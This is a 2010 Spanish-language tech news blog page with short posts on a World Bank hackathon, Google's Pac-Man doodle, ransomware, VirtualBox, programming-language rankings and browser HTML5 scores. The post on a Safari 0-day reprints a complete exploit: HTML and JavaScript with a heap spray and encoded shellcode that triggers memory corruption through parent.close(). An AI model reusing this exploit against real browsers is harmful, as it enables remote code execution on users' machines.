¡La Informática al límite!
Noticias
El Banco Mundial se alía con los ‘hackers’
5 jun
Unos 200 piratas informáticos participan en un ‘maratón’ para desarrollar programas y aplicaciones que ayuden en desastres naturales
Washington. (EFE).- Unos 200 piratas informáticos participan hoy y mañana en un “maratón” tecnológico auspiciado por el Banco Mundial (BM) para desarrollar programas y aplicaciones que ayuden en desastres naturales como el terremoto de Haití.
El evento, que se celebrará en la sede de Microsoft, en el estado norteamericano de Maryland, contará, además de con expertos de esa empresa, con representantes de Yahoo, la NASA y Google, además de “piratas” con un variopinto perfil.
“No hemos puesto ningún tipo de restricción al tipo de personas que pueden asistir, como si quiere venir un genio informático de 14 años”, dijo a EFE Patrick Svenburg, quien indicó que entre los participantes habrá muchos estudiantes universitarios.
Svenburg reconoció que el término “pirata” (hacker en inglés) ha adquirido una connotación negativa y se relaciona con actividades ilícitas como la incursión indebida en grandes bases de datos.
Precisó, aun así, que en la industria un “hacker” es simplemente aquel que encuentra la solución a un problema, el objetivo precisamente del “maratón” de este fin de semana que contará con eventos satélite en Nairobi, Sao Paulo, Santiago de Chile y Sidney.
La idea es desarrollar programas que permitan, Más >
Google celebra el 30 aniversario de Pac-Man
22 may
30 años no se cumple todos los días. Muchas personas no celebran con ilusión su 30 cumpleaños, pero el famoso come fantasma Pac-Man lo hace por todo a lo grande gracias al logo que ha hecho Google para su buscador, pero con la peculiaridad de que al poco tiempo se transforma en un juego interactivo que te permite jugar a Pac-Man con todos sus efectos, incluido el sonido.
Además, si haces clic en el botón “Insert Coin”, puedes jugar tanto Pac-Man y Ms. Pac-Man, el primero utiliza las flechas del teclado, mientras que el compañero lo hace con las teclas W, A, S y D. El juego estará disponible probablemente todo el fin de semana, hasta el lunes, momento en que Google cambiará de logo.
Haciendo un breve resumen, Pac-Man es un videojuego árcade creado por el diseñador Toru IWarani, de la empresa Namco, y distribuido por Midway Games al mercado estadounidense el 22 de mayo de 1980, momento en que terminó con las reglas impuestas por Space Invaders. El nombre del juego proviene de la onomatopeya japonesa Paku, que es el sonido que produce al abrir y cerrar la boca, y comenzó llamándose Puck-Man, pero Midway lo modificó a Pac-Man para evitar que la gente malintencionada alterará la palabra Puck Más >
0-Day en el navegador web Safari
13 may
Una empresa holandesa, Secunia, ha detectado un fallo crítico en el navegador Safari que permite ejecutar código malicioso. Éste fue detectado en la versión 4.5 del navegador, y corriendo en Windows 7, aunque no se descarta que pueda ocurrir en otras versiones y en Mac.
Al parecer, el problema puede provenir de la apertura de las nuevas ventanas, pues en el momento de cerrar el pop up, si éste viene de páginas o correos en HTML malicioso, se abre inequívocamente la puerta a la instalación y ejecución de malware.
De momento, Apple no ha confirmado nada, por lo que no se ha lanzado ningún parche de seguridad. Sin embargo, los expertos recomiendan tener cuidado con los mensajes que se abren vía webmail e inhabilitar el javascript de aquellas páginas que no nos creen mucha confianza.
Exploit:
<!-- Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command (calc) Local: Yes Remote: Yes (POPUP must be enabled [Ctrl+Shift+K]) Just for fun ;) --> <!---------------------------------REMOTE.htm---------------------------------> <script> window.open("0day.htm"); //parent.close() activation self.close(); </script> -----------------------------------REMOTE.htm--------------------------------> <!---------------------------------0day.htm----------------------------------> <h1>Alt + F4 :)</h1> <script> function make_buf(payload, len) { while(payload.length < (len * 2)) payload += payload; payload = payload.substring(0, len); return payload; } var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+ "%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+ "%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+ "%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+ "%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1000;i++) memory[i] = block + shellcode; var a = parent; var buf = make_buf("AAAA", 10000); for(var i = 0; i <= 1; i++) { a.prompt(alert); a.prompt(buf); a.close(); } </script> <!---------------------------------0day.htm---------------------------------->Más >
Khobe: un terremoto causado por la caída de un alfiler.
12 may
El pasado 9 de mayo, investigadores de Matousec publicaron el artículo Khobe 8.0 Earthquake vulnerability un artículo sobre una supuesta vulnerabilidad o forma de ataque a cual todos los AV, HIPS y, virtualmente cualquier aplicación sería vulnerable, siempre y cuando se utilizaran hooks (enganches) SSDT (System Service Descriptor Table) en el Kernel del sistema operativo Windows. El tabla SSDT contiene llamadas al núcleo y a las funciones del sistema operativo y por lo tanto a través de ella se puede controlar las funciones del mismo así como también es una manera ideal de controlar la protección en tiempo real, la implementada en los productos de antivirus. Es común, frecuente y correcto que los productos de seguridad obtengan acceso legal a esta tabla para implementar todas las medidas necesarias para evitar la ejecución de código dañino en el sistema. Esto es lo que describe y “descubre” el paper mencionado pero en realidad, este tipo de ataque es lo que se conoce desde hace tiempo (al menos desde 1996) como ToC-ToU (Time-of-Check-to-Time-of-Use) o genéricamente como Race Condition (condición de carrera) en donde se dice que la primera aplicación en ejecutarse es la que obtiene el control del proceso. También es posible encontrar Más >
Ransomware se propaga a través de páginas pornográficas
8 may
El malware del tipo ransomware es cada vez más habitual en América Latina. Si bien el mayor caudal de desarrollo de este tipo de malware se concentra en Rusia, esa situación no limita la migración de la amenaza hacia otras regiones, y las consecuencias, son exactamente las mismas que sufre un usuario de Rusia como un usuario de Latinoamérica.
En esta oportunidad, se trata de ransomware que se propaga a través de páginas pornográficas, empleando la clásica estrategia de Ingeniería Social que busca atraer la atención de los usuarios al intentar visualizar un supuesto video.
En esta instancia, a través de una ventana emergente se alerta de la necesidad de instalar Flash Player 10 para poder reproducir el video con extensión FLV.
A diferencia de otras variantes, este ransomware no bloquea el acceso completo al sistema operativo sino que muestra en pantalla una ventana con una imagen obscena que se ubica en el ángulo inferior derecho, solicitando el envío de un mensaje SMS para poder eliminar la ventana.
Adicionalmente, abre constantemente una página pornográfica que redirecciona hacia otras con contenido similar.
La amenaza es detectada proactivamente por ESET NOD32 con el nombre de Win32/Kryptik.EAU, por lo que recomendamos su implementación y actualización, como así también explorar los Más >
VirtualBox 3.2.0 (BETA) ofrece la posibilidad de virtualizar Mac OS X
4 may
La semana pasada se presentó la primera beta de la version 3.2 de Virtualbox, es más que una simple actualización, aparecen varios cambios, ya no es simplemente “Virtualbox”, ahora pasa a denominarse Oracle VM VirtualBox.
Pero la principal novedad es que esta nueva versión permite virtualizar (experimentalmente) un sistema Mac OS X. La complicación de la virutalización de este sistema reside en que la licencia de uso de OS X no permite la virtualización si no es a traves de un sistema Mac OS X Server además de por lo que se ha visto, esta virtualización solo funciona correctamente si se realiza sobre máquinas Apple.
Como dice este segundo punto, es algo que tuvieron que discutir Oracle y Apple.
En esta primera beta también se han trabajado otros aspectos, como mejoras de rendimiento, soporte para varios monitores, teclados USB, etc…
Su descarga es posible aquí: http://download.virtualbox.org/virtualbox/3.2.0_BETA1/, para todos los SO.
Si encontrais bugs usad los foros de vbox: http://forums.virtualbox.org/viewforum.php?f=15
Vía: Vbox Forums & genbeta
Ranking lenguajes de programación Abril 2010
26 abr
El Indice Comunitario de Programación TIOBE, vuelve a ofrecernos una nueva clasificación de aquellos lenguajes de programación de mayor relevancia mediática en la Red.
El ranking elaborado a partir de las búsquedas llevadas a cabo en los principales motores de búsqueda (Bing, Yahoo, Google, Wikipedia, Youtube…) a través del nombre de dicho lenguaje, es una interesante referencia para conocer la importancia de cada uno de estos lenguajes entre los desarrolladores web.
Ranking lenguajes de programación abril 2010
- C
- Java
- C++
- PHP
- (Visual) Basic
- C#
- Python
- Perl
- Delphi
- JavaScript
De este último ranking destaca que tras 4 años, C vuelve a ocupar la 1ª posición entre los lenguajes de programación con un 18.058% de cuota de mercado frente al 18.051% de Java que continua en su perdida de usuarios.
Los lenguajes que más han crecido en el último año son:
- C con un crecimiento del 2.59%
- Objective-C con un crecimiento del 2.15%
- Go con un crecimiento del 0.71%
La industria cultural pide instalar software espía en los ordenadores
17 abr
Año 2010 y parece que nos acercamos a 1984. George Orwell aventuraba en su libro el control férreo de los ciudadanos por parte de un estado todopoderoso que espiaba y tenía constancia de todos sus movimientos. Ahora es la industria cultural estadounidense quien ha sugerido al Gobierno de su país que tome medidas para proteger la propiedad intelectual. Entre ellas está la instalación de software espía en los ordenadores que pueda detectar e incluso borrar los contenidos descargados por los usuarios.
Según recoge el diario Público, haciéndose eco de la Fundación Frontera Electrónicas, las industrias del cine (RIAA), la música (MPAA) y la televisión entre otras habrían solicitado al Gobierno a través de una carta una serie de medidas para proteger los derechos de autor y la propiedad intelectual. En la misiva, la industria hace hincapié en cinco medidas concretas para luchar contra quienes infringen el copyright. Para empezar sugieren a al Gobierno la instalación de un software por parte de la propia Administración y los proveedores de Internet que detectaría el uso de contenidos protegidos con copyright tras escanear constantemente los archivos del usuario. Este spyware estaría basado en herramientas como pueden ser los antivirus, lo que podría llevar incluso Más >
Chrome lidera con nota la compatibilidad con HTML5
13 abr
El navegador de Google lidera la clasificación de navegadores en cuanto a compatibilidad con el estándar HTML5 propuesto por W3C y que será estándar oficial en 2012.
La página html5test.com ha puesto a disposición de cualquiera una serie de tests que ponen a prueba las capacidades HTML5 de los navegadores actuales, incluyendo Canvas, geolocalización, etiqueta vídeo, etcétera.
La puntuación se da en un baremo de hasta 160 y Chrome rinde 137 puntos seguido de cerca por Safari con 113 y Opera y Firefox con 102 y 101 respectivamente. ¿A alguien le sorprende que Internet Explorer 8 e incluso Internet Explorer 9 Preview obtengan sólo 19 puntos de 160 posibles?.
Visto en: http://www.theinquirer.es/2010/04/13/chrome-lidera-con-nota-la-compatibilidad-con-html5.html
Una vez más Internet Explorer nos demuestra su gran “eficiencia” ¿No?.
Saludos,
